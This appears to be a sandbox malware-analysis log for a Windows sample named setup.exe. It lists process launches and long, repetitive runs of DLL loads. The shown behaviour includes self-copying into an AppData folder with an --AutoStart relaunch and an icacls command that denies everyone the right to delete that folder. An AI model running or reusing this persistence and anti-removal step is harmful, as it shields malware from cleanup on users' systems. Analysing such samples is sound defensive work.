        Source: unknownProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: unknownProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: unknownProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeProcess created: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe "C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exe" --AutoStart
        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: drprov.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: ntlanman.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: davclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: davhlpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: browcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: aclayers.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msimg32.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: aclayers.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: aclayers.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msimg32.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeSection loaded: sspicli.dll
